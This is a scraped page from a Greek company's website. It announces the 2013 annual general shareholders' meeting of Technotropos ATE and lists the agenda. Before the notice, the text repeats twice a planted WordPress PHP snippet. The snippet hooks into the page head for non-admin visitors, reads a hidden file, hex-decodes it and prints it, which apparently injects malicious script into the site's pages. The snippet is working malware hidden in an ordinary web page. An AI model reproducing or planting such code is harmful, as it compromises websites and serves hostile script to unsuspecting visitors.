if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } [4/6/2013] ΠΡΟΣΚΛΗΣΗ ΕΤΗΣΙΑΣ ΤΑΚΤΙΚΗΣ ΓΕΝΙΚΗΣ ΣΥΝΕΛΕΥΣΗΣ ΤΩΝ ΜΕΤΟΧΩΝ – Technotropos ATE

“ΤΕΧΝΟΤΡΟΠΟΣ A.Τ.E TEXNIKH-EMΠΟΡΙΚΗ-ΤΟΥΡΙΣΤΙΚΗ-ΒΙΟΜΗΧΑΝΙΚΗ ΕΤΑΙΡΕΙΑ”

AΡMAE 58718/01ΑΤ/Β/05/228

ΠΡΟΣΚΛΗΣΗ

ΕΤΗΣΙΑΣ ΤΑΚΤΙΚΗΣ ΓΕΝΙΚΗΣ ΣΥΝΕΛΕΥΣΗΣ ΤΩΝ ΜΕΤΟΧΩΝ

 

Σύμφωνα με τον νόμο και το καταστατικό, το Διοικητικό Συμβούλιο  καλεί τους μετόχους της ανωνύμου εταιρείας με την επωνυμία “ΤΕΧΝΟΤΡΟΠΟΣ Α.Τ.Ε. ΤΕΧΝΙΚΗ-ΕΜΠΟΡΙΚΗ-ΤΟΥΡΙΣΤΙΚΗ-ΒΙΟΜΗΧΑΝΙΚΗ ΕΤΑΙΡΕΙΑ”   σε Ετήσια Τακτική   Γενική Συνέλευση την 30η  Ιουνίου  2013 ημέρα Κυριακή  και ώρα   11:00 π.μ.  στα  γραφεία της εταιρείας, επί της  οδού Θερίσσου 14  στην Αγ. Παρασκευή, για συζήτηση και λήψη απόφασης για το παρακάτω θέμα.

ΘΕΜΑΤΑ      ΗΜΕΡΗΣΙΑΣ     ΔΙΑΤΑΞΗΣ

 

  1. Εγκριση  των ετησιων οικονομικών καταστάσεων ,του Ισολογισμού της 01.01.2012- 31.12.2012 ,του Λογαριασμού Αποτελεσμάτων της χρήσης ,του Πίνακα Διαθέσεως Αποτελεσμάτων χρήσης και του Προσαρτήματος.
  2. Απαλλαγή των μελών του Δ.Σ απο κάθε ευθύνη διαχείρισης,ελέγχου και αποζημίωσης για την χρήση 2012 (01.01.2012 εως 31.12.2012).
  3. Εγκριση αμοιβών μελών  Δ.Σ. και παροχή αδείας για σύναψη συμβάσεων εργασίας ή εντολής της Εταιρείας με μέλη του Δ.Σ. και καθορισμός ανωτάτου ορίου αποδοχών τους .
  4. Έγκριση συμμετοχής Μελών του Διοικητικού Συμβουλίου και Διευθυντικών  Στελεχών της Εταιρείας στή Διοίκηση Εταιρειών οι οποίες συνδέονται με οποιονδήποτε τρόπο με την Εταιρεία.
  5. Λοιπά θέματα και ανακοινώσεις .

Οι μέτοχοι που θέλουν να πάρουν μέρος στην παραπάνω Ετήσια Τακτική   Γενική Συνέλευση, οφείλουν πέντε (5) τουλάχιστον ημέρες πριν από την ημερομηνία που θα γίνει η  Γενική Συνέλευση, είτε να καταθέσουν στο Ταμείο της εταιρείας τις μετοχές τους ή στο Ταμείο Παρακαταθηκών και Δανείων ή σε οποιαδήποτε στην Ελλάδα ανώνυμη Τραπεζική Εταιρεία, καθώς και τα τυχόν έγγραφα αντιπροσώπευσης.

 

 

Αγία Παρασκευή 03/ 06/ 2013

Το Διοικητικό Συμβούλιο

9E358B3733BB989A